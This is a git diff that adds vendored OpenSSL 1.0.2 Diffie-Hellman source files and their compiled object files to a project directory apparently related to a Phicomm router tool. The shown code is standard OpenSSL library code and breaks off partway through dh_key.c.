diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..13c0e162b87e435fcaca511e825d8e9f8e7be518
GIT binary patch
literal 1360
zcmbtT%}T>S5S}#kzhD&)LPhFHMZ2{AAbOC3)_M?;LcxoKw2iH3(~@kV^`Nidqxc8~
zU%<!ksCe_DGtF+gT`PhPY-Z-$`Q~SLbDujoiWmk+F<>A1o<sr8B7HmCGqVtbDR`e=
z{CI-=!NFc~rC4gYyp`N#n=GBm?6i7r=58a+(p#$m3{m99agE^0pB4erb_p|ak<0}O
zjN1Yj?YNPMjg3EGLxeAgJ>vc*G(!~LK8MAbLnovjlpz(O8Fr_DXqvq#1~KwX82t|R
z@Ub6oI)Oo%M0Zx{Gn~0nvmDQ3Wylo@)=k5%Sck`!&%G<R>LVv9($FLW(=fkN=XMDg
z#s<13E$*~Au!_xXU?txNR&Lbmj*FPv;10uUO8ML_UkktLwpi0^G#!t3fO*c1&77Kb
z>DhHh6#s`xAeZh=Kf$cX8J>giDOQywbO@90N$%yOp=q7JjQiub{>ooRF6B()QbpEZ
zQ$e(4eW|w<Obu<Sj$%umgs2X^vVprtU-FY^t3tD?a)A!z)cFr0NS{mRpJN=o=B$X9
z>RB{8FMtWu)TiW2d{}Lwbm@cg8YrOugL3G6!t}c%%A=^iNRA=`4v`tOhVfrSU^R>k
H44wZ42fI$*

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_gen.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_gen.c
new file mode 100644
index 0000000..5bedb66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_gen.c
@@ -0,0 +1,204 @@
+/* crypto/dh/dh_gen.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * NB: These functions have been upgraded - the previous prototypes are in
+ * dh_depr.c as wrappers to these ones.  - Geoff
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/dh.h>
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+static int dh_builtin_genparams(DH *ret, int prime_len, int generator,
+                                BN_GENCB *cb);
+
+int DH_generate_parameters_ex(DH *ret, int prime_len, int generator,
+                              BN_GENCB *cb)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(ret->meth->flags & DH_FLAG_FIPS_METHOD)
+        && !(ret->flags & DH_FLAG_NON_FIPS_ALLOW)) {
+        DHerr(DH_F_DH_GENERATE_PARAMETERS_EX, DH_R_NON_FIPS_METHOD);
+        return 0;
+    }
+#endif
+    if (ret->meth->generate_params)
+        return ret->meth->generate_params(ret, prime_len, generator, cb);
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_dh_generate_parameters_ex(ret, prime_len, generator, cb);
+#endif
+    return dh_builtin_genparams(ret, prime_len, generator, cb);
+}
+
+/*-
+ * We generate DH parameters as follows
+ * find a prime q which is prime_len/2 bits long.
+ * p=(2*q)+1 or (p-1)/2 = q
+ * For this case, g is a generator if
+ * g^((p-1)/q) mod p != 1 for values of q which are the factors of p-1.
+ * Since the factors of p-1 are q and 2, we just need to check
+ * g^2 mod p != 1 and g^q mod p != 1.
+ *
+ * Having said all that,
+ * there is another special case method for the generators 2, 3 and 5.
+ * for 2, p mod 24 == 11
+ * for 3, p mod 12 == 5  <<<<< does not work for safe primes.
+ * for 5, p mod 10 == 3 or 7
+ *
+ * Thanks to Phil Karn <karn@qualcomm.com> for the pointers about the
+ * special generators and for answering some of my questions.
+ *
+ * I've implemented the second simple method :-).
+ * Since DH should be using a safe prime (both p and q are prime),
+ * this generator function can take a very very long time to run.
+ */
+/*
+ * Actually there is no reason to insist that 'generator' be a generator.
+ * It's just as OK (and in some sense better) to use a generator of the
+ * order-q subgroup.
+ */
+static int dh_builtin_genparams(DH *ret, int prime_len, int generator,
+                                BN_GENCB *cb)
+{
+    BIGNUM *t1, *t2;
+    int g, ok = -1;
+    BN_CTX *ctx = NULL;
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    t1 = BN_CTX_get(ctx);
+    t2 = BN_CTX_get(ctx);
+    if (t1 == NULL || t2 == NULL)
+        goto err;
+
+    /* Make sure 'ret' has the necessary elements */
+    if (!ret->p && ((ret->p = BN_new()) == NULL))
+        goto err;
+    if (!ret->g && ((ret->g = BN_new()) == NULL))
+        goto err;
+
+    if (generator <= 1) {
+        DHerr(DH_F_DH_BUILTIN_GENPARAMS, DH_R_BAD_GENERATOR);
+        goto err;
+    }
+    if (generator == DH_GENERATOR_2) {
+        if (!BN_set_word(t1, 24))
+            goto err;
+        if (!BN_set_word(t2, 11))
+            goto err;
+        g = 2;
+    }
+#if 0                           /* does not work for safe primes */
+    else if (generator == DH_GENERATOR_3) {
+        if (!BN_set_word(t1, 12))
+            goto err;
+        if (!BN_set_word(t2, 5))
+            goto err;
+        g = 3;
+    }
+#endif
+    else if (generator == DH_GENERATOR_5) {
+        if (!BN_set_word(t1, 10))
+            goto err;
+        if (!BN_set_word(t2, 3))
+            goto err;
+        /*
+         * BN_set_word(t3,7); just have to miss out on these ones :-(
+         */
+        g = 5;
+    } else {
+        /*
+         * in the general case, don't worry if 'generator' is a generator or
+         * not: since we are using safe primes, it will generate either an
+         * order-q or an order-2q group, which both is OK
+         */
+        if (!BN_set_word(t1, 2))
+            goto err;
+        if (!BN_set_word(t2, 1))
+            goto err;
+        g = generator;
+    }
+
+    if (!BN_generate_prime_ex(ret->p, prime_len, 1, t1, t2, cb))
+        goto err;
+    if (!BN_GENCB_call(cb, 3, 0))
+        goto err;
+    if (!BN_set_word(ret->g, g))
+        goto err;
+    ok = 1;
+ err:
+    if (ok == -1) {
+        DHerr(DH_F_DH_BUILTIN_GENPARAMS, ERR_R_BN_LIB);
+        ok = 0;
+    }
+
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    return ok;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_gen.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_gen.o
new file mode 100644
index 0000000000000000000000000000000000000000..2da0497145113eb0714379b29a1712bdbc887107
GIT binary patch
literal 2792
zcmbuATWB0r7=X`abJ?cb$=XU;Xep}{P0<d!w&2<a*_rGlv$9ELyU~b^!(?+z)V+k+
zGc-|pfo;?=UhzfnN${bF4?aqv+dxaj7cGL&H~S#i5Pc}(6-)g8nK{|haRx+xID7u{
zo&R!f`_EaeJl+?J5iT+EIO&ZzCFH_TPcOJ?f$Snl^7F`nKb5CT&ezIQ%CzEqt5m0T
z=gtYe^J7|Hd+i)pI_zLlUn>;!)peHAJ6F@s&MGIBS>-v!*t&TOLzSGXFgbGm2qe~>
zFI-l3e&Bt{x#p_6b7gY%*OBu{G(-D1DxK2_!gfHHBKCuudwfeR0T%Yg#!U#%QOb4t
z3W(CV6FYlA%dO|Wyhvf(eGz^x4{+O!PduAGdw(|#YT5bCjnUl+15Eq|^qWT^%7C5j
z4vQ9X*MikI_jdaP4qJbwi^r-v-?^ax==$2}#2OsVr1M9~xlwj*UqlN&eJJ-$7o(M(
zEspkrN2*l&MY$vx+V^?;K-=CvwA@dw*W~K=EG3+!3-J<)&aK`(Tp<%<W5+V1({px{
z*_p@WBXag|?orzv=FU8lm9s|=c^I;|(ht8WXn1H7Q_}=?yN(Q(fpV|ck=V->5?fBi
z_9cfB@4~X@f$#U{uHiPurPMopnv{M!u1cA=`Za0v%>hNqzB*Wx@|~fg^yJL2ln0<l
zqhO#)X;n(8QbOGsUx`Wi;y)(**ijv(>?gOk!sg?lFCX{BcXhW{93q8DoD7Cxh$8%n
z1dBLH2&0}FcTcxBMh#!vZegA783H>94eui;#{h(JErM4f_-q8n`wWY3Mes8b{QU_2
zQ3U@qf|L10V}Um18Y$|iP|IZ0STZfMK^e8$23;n`MESU?l#S!#<0rJLQB~BkW)OAC
z7^}`0O?rx}ZDv}G4;HAa;<Q$&7)v%YsAaV*oNrTRoN8I~sP}SOFEl8o12~~gjj2Y>
ztk-!s+H|ck<MS4!qyYOt!54*P=C3VJst7@lC!ukE5+MlkUC=mRKnN1#?|Ine66oCi
z;|P9T;3I;)TR>op@$ueyoMHT9fdu*e5gcoMn0-ay_kaP9PX)eP;I9Z=T+fFB7uSD5
z;CqBPp9vgm7tfmk9R;g7wr!EyD-CAO5xLDQuV3VvMeC-_=rSYnyva-=&$Zh`uC*Es
z+62~YF)BmNJPhxv_L4tdXxj3U)mow!TOqO=fiA++fM>g%^8Y9qaK<eLD^md&3a=yH
z$g|}-_WPjW-4>vU@;ZJ1KtAx#59<@EyrSXv6XgMD$b*%1@UBBeOHcf8d`KP!4P*XS
z{~Y*Y%q%ofc>ae(2s+Qtd#s~e7fo~ja{W($6ITDAdEN&ZF(~N#{5YNi1@i~}XMAvu
z8~T0FAM1D6{bl@562B+BKlJ7PoQLJcR5$$mzx#)SwQEO+KeFK60V3CNQ6Qgt-S%(r
Ttg#k^`RD!h*S9@ACFuV*rM0~%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_kdf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_kdf.c
new file mode 100644
index 0000000..a882cb2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_kdf.c
@@ -0,0 +1,187 @@
+/* crypto/dh/dh_kdf.c */
+/*
+ * Written by Stephen Henson for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <string.h>
+#include <openssl/dh.h>
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#include <openssl/cms.h>
+
+/* Key derivation from X9.42/RFC2631 */
+
+#define DH_KDF_MAX      (1L << 30)
+
+/* Skip past an ASN1 structure: for OBJECT skip content octets too */
+
+static int skip_asn1(unsigned char **pp, long *plen, int exptag)
+{
+    const unsigned char *q = *pp;
+    int i, tag, xclass;
+    long tmplen;
+    i = ASN1_get_object(&q, &tmplen, &tag, &xclass, *plen);
+    if (i & 0x80)
+        return 0;
+    if (tag != exptag || xclass != V_ASN1_UNIVERSAL)
+        return 0;
+    if (tag == V_ASN1_OBJECT)
+        q += tmplen;
+    *plen -= q - *pp;
+    *pp = (unsigned char *)q;
+    return 1;
+}
+
+/*
+ * Encode the DH shared info structure, return an offset to the counter value
+ * so we can update the structure without reencoding it.
+ */
+
+static int dh_sharedinfo_encode(unsigned char **pder, unsigned char **pctr,
+                                ASN1_OBJECT *key_oid, size_t outlen,
+                                const unsigned char *ukm, size_t ukmlen)
+{
+    unsigned char *p;
+    int derlen;
+    long tlen;
+    /* "magic" value to check offset is sane */
+    static unsigned char ctr[4] = { 0xF3, 0x17, 0x22, 0x53 };
+    X509_ALGOR atmp;
+    ASN1_OCTET_STRING ctr_oct, ukm_oct, *pukm_oct;
+    ASN1_TYPE ctr_atype;
+    if (ukmlen > DH_KDF_MAX || outlen > DH_KDF_MAX)
+        return 0;
+    ctr_oct.data = ctr;
+    ctr_oct.length = 4;
+    ctr_oct.flags = 0;
+    ctr_oct.type = V_ASN1_OCTET_STRING;
+    ctr_atype.type = V_ASN1_OCTET_STRING;
+    ctr_atype.value.octet_string = &ctr_oct;
+    atmp.algorithm = key_oid;
+    atmp.parameter = &ctr_atype;
+    if (ukm) {
+        ukm_oct.type = V_ASN1_OCTET_STRING;
+        ukm_oct.flags = 0;
+        ukm_oct.data = (unsigned char *)ukm;
+        ukm_oct.length = ukmlen;
+        pukm_oct = &ukm_oct;
+    } else
+        pukm_oct = NULL;
+    derlen = CMS_SharedInfo_encode(pder, &atmp, pukm_oct, outlen);
+    if (derlen <= 0)
+        return 0;
+    p = *pder;
+    tlen = derlen;
+    if (!skip_asn1(&p, &tlen, V_ASN1_SEQUENCE))
+        return 0;
+    if (!skip_asn1(&p, &tlen, V_ASN1_SEQUENCE))
+        return 0;
+    if (!skip_asn1(&p, &tlen, V_ASN1_OBJECT))
+        return 0;
+    if (!skip_asn1(&p, &tlen, V_ASN1_OCTET_STRING))
+        return 0;
+    if (CRYPTO_memcmp(p, ctr, 4))
+        return 0;
+    *pctr = p;
+    return derlen;
+}
+
+int DH_KDF_X9_42(unsigned char *out, size_t outlen,
+                 const unsigned char *Z, size_t Zlen,
+                 ASN1_OBJECT *key_oid,
+                 const unsigned char *ukm, size_t ukmlen, const EVP_MD *md)
+{
+    EVP_MD_CTX mctx;
+    int rv = 0;
+    unsigned int i;
+    size_t mdlen;
+    unsigned char *der = NULL, *ctr;
+    int derlen;
+    if (Zlen > DH_KDF_MAX)
+        return 0;
+    mdlen = EVP_MD_size(md);
+    EVP_MD_CTX_init(&mctx);
+    derlen = dh_sharedinfo_encode(&der, &ctr, key_oid, outlen, ukm, ukmlen);
+    if (derlen == 0)
+        goto err;
+    for (i = 1;; i++) {
+        unsigned char mtmp[EVP_MAX_MD_SIZE];
+        EVP_DigestInit_ex(&mctx, md, NULL);
+        if (!EVP_DigestUpdate(&mctx, Z, Zlen))
+            goto err;
+        ctr[3] = i & 0xFF;
+        ctr[2] = (i >> 8) & 0xFF;
+        ctr[1] = (i >> 16) & 0xFF;
+        ctr[0] = (i >> 24) & 0xFF;
+        if (!EVP_DigestUpdate(&mctx, der, derlen))
+            goto err;
+        if (outlen >= mdlen) {
+            if (!EVP_DigestFinal(&mctx, out, NULL))
+                goto err;
+            outlen -= mdlen;
+            if (outlen == 0)
+                break;
+            out += mdlen;
+        } else {
+            if (!EVP_DigestFinal(&mctx, mtmp, NULL))
+                goto err;
+            memcpy(out, mtmp, outlen);
+            OPENSSL_cleanse(mtmp, mdlen);
+            break;
+        }
+    }
+    rv = 1;
+ err:
+    if (der)
+        OPENSSL_free(der);
+    EVP_MD_CTX_cleanup(&mctx);
+    return rv;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_kdf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_kdf.o
new file mode 100644
index 0000000000000000000000000000000000000000..062fce6dc20cb47215a4b1240189ec5776224d48
GIT binary patch
literal 3448
zcmbuBU2IcT9KcUMU=_z*`B0ibNJB1WfHW;1VZ%gwySwe67q-wAXA~}7d&lb5u4!*|
z5Q1B_p*N+-1DHJ;;)4%7_`m}(ixQc@lOaS+NPHkfab`py^8-Pt|Npu7u)ESGCjOIi
z&pE&I|GMY=?`hv_S2~;y2jSu%FO&Hhr-ZaDnIDJQFie(`Mk2)|<J&kjeveY)5gohZ
zS4!<9MN97W&7egMS@eZ2(ozF0E25hkw`f@xy|jE(^x&Fj23@Tmfk$yiX{9K)-YSO1
zj*4zl+&K1dad8PP$)N54O&o#ES9H?~x*-mpT^BIVStq(zL|=+-ZDcX^Ma(H3oA$rC
zUwZ4(T+`Zz((BSbDK5p@LqEo&bo7o7OsN4$D5WW}hfQK)Gc^>^tH1-CJ$Zp~(F5xc
z<ccf?At0fnf59`{^uFRGL@_F~d`_H1Zp`gAE}OB9yGnA#9F9(j-IyqtyerVrM>wFR
znCN@Q1KIp?4}+H%;W`B9aYK(AlcN`K$fy0ZEQ|fPa1cj5n9MNRD26Ul<lS`Qy1u<M
z&Vo_nwD<vfDxVfdpuaLMjzh=1!T1!6QH*hM1UfttiboPOZm^suE;gM!SgBMn&7e|F
ziD3m)TIi%=+*XV~F`SPYF|p-yFPg(NJoDQ>l?vF6H-jC+rtZuS7WX1w4C)r2w)lg`
zz%en4pR@Q);IwoUVz8{s+d+k}>?C6v0!@6$6lAeQ`U1BXv+#$mE5>7L+%<O|viH)G
zj^}C;%x?sBp<ev5agQAXEH+&=9H<zy-d;bTw9e+&A@YQ-&s*yq%7$6}CB-o)dZfzb
z*;7jSym%EHG9|_MgWIpg%sl|8abxZi#rPF=jjc&jELT_!(uoSM)F%m>wFZ^!UQo%S
z(^#*vaTDuV+AkfD)Jt=#)<sEYTiZ^5bG)~h)r<btz}7%;b7)7AO+&}F1Ovfs8%%7T
zJ)Ra;TIZfPf!e)@JL`gmveN8`<H%m(81_0=H#T@qLDUz4ud&w7VjmH_C!Dh2JMNMN
z|CqZ|2s=**eo632f;S>~6i~s2@;wA09fJ2mXGHLwbVUSz*&Pv@Pb`v!;PJ(h&@$H0
zDO_{9K645!fFz+AR6rF%fG6gn?gRJHP3~7}DY$ChVEC^5Z5LX(*q5=8;dSS<`C;!4
z4EM=l^MiZH#YM2dpB5Kscp3t6k=ifmVyCpwWGzhb{HkRefLdIx!{fl0!yEATVP^!a
zw~l_c4nJ0hpRU6(UadUO*Wq8+;osHaKh@#)>u{3lR|iskfg~vmq;qPbkPVTfo)3gV
zp<s}xok~|kQq-=Fj%a&KjY$!uT_sX<Pe?ta>FQAL+geg5s#?$!$pJOlKcMy{(t|{%
z>T7a`+S96T+d|s+b*sB&wU9od@o`(MM@?tbI%(S-Ripihyq4OP?Hf|HY;q{2k+!{W
zbjP~XjFw4ea?D0fAJPi?E-+EGVH=6(QVHF3YpQglvxz~{)!n`)8dcQfpq9uMo;d8w
zYYS3f%f%e*4Ez?cr+Gg#!uW5vr%}$>_);5Rh94dX)_oH+uD`~{@tisDw73%(etn!@
zv*|Ch@iZ!eRO@Fgj&YYm<9<G}@f9}ysg2_|%k{sh!*AR8b2fd!x-u}Xoo}@9=WY70
z*!U_N@3e8BjjJ|p-)BGQpkP{7YHZ%kp7Z>yH79|>;f$W>g<j8_eLo-NwZTL{*M@Zx
zfU-%DKyRTy0?DCFM#}=r4(VC|eiJscYPRNwvc*6yKa|t*`e71a9<+Y7FQ3S0JmUZA
z{a}qHP<>;DfuRgr`(n;aT|UNsH8ebvFti0?U8$2+ec?ThLw?iZ-lMz#4S7`<a=~^U
zsK>=}$EWOf5q(zMPgMiUqS`(L99hs>=N-4-#DUdwd*1H^&c}AupZ{b0SHTE>mF%^J
zer7CtKTd4I_m87q7-0Nrdk-E82>v6sOSS!eSgdt^lh2q|d|&YV(3act^Q#pbEkCy6
o_gINN3k+MeJ%*{ZRS&F!bXRR|)s*0!Rm=XWmH!~D+ojt6Un3lNZU6uP

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_key.c
new file mode 100644
index 0000000..1d80fb2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_key.c
@@ -0,0 +1,289 @@
+/* crypto/dh/dh_key.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rand.h>
+#include <openssl/dh.h>
+
+static int generate_key(DH *dh);
+static int compute_key(unsigned char *key, const BIGNUM *pub_key, DH *dh);
+static int dh_bn_mod_exp(const DH *dh, BIGNUM *r,
+                         const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+static int dh_init(DH *dh);
+static int dh_finish(DH *dh);
+
+int DH_generate_key(DH *dh)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(dh->meth->flags & DH_FLAG_FIPS_METHOD)
+        && !(dh->flags & DH_FLAG_NON_FIPS_ALLOW)) {
+        DHerr(DH_F_DH_GENERATE_KEY, DH_R_NON_FIPS_METHOD);
+        return 0;
+    }
+#endif
+    return dh->meth->generate_key(dh);
+}
+
+int DH_compute_key(unsigned char *key, const BIGNUM *pub_key, DH *dh)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(dh->meth->flags & DH_FLAG_FIPS_METHOD)
+        && !(dh->flags & DH_FLAG_NON_FIPS_ALLOW)) {
+        DHerr(DH_F_DH_COMPUTE_KEY, DH_R_NON_FIPS_METHOD);
+        return 0;
+    }
+#endif
+    return dh->meth->compute_key(key, pub_key, dh);
+}
+
+int DH_compute_key_padded(unsigned char *key, const BIGNUM *pub_key, DH *dh)
+{
+    int rv, pad;
+    rv = dh->meth->compute_key(key, pub_key, dh);
+    if (rv <= 0)
+        return rv;
+    pad = BN_num_bytes(dh->p) - rv;
+    if (pad > 0) {
+        memmove(key + pad, key, rv);
+        memset(key, 0, pad);
+    }
+    return rv + pad;
+}
+
+static DH_METHOD dh_ossl = {
+    "OpenSSL DH Method",
+    generate_key,
+    compute_key,
+    dh_bn_mod_exp,
+    dh_init,
+    dh_finish,
+    0,
+    NULL,
+    NULL
+};
+
+const DH_METHOD *DH_OpenSSL(void)
+{
+    return &dh_ossl;
+}
+
+static int generate_key(DH *dh)
+{
+    int ok = 0;
+    int generate_new_key = 0;
+    unsigned l;
+    BN_CTX *ctx;
+    BN_MONT_CTX *mont = NULL;
+    BIGNUM *pub_key = NULL, *priv_key = NULL;
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        goto err;
+
+    if (dh->priv_key == NULL) {
+        priv_key = BN_new();
+        if (priv_key == NULL)
+            goto err;
+        generate_new_key = 1;
+    } else
+        priv_key = dh->priv_key;
+
+    if (dh->pub_key == NULL) {
+        pub_key = BN_new();
+        if (pub_key == NULL)
+            goto err;
+    } else
+        pub_key = dh->pub_key;
+
+    if (dh->flags & DH_FLAG_CACHE_MONT_P) {
+        mont = BN_MONT_CTX_set_locked(&dh->method_mont_p,
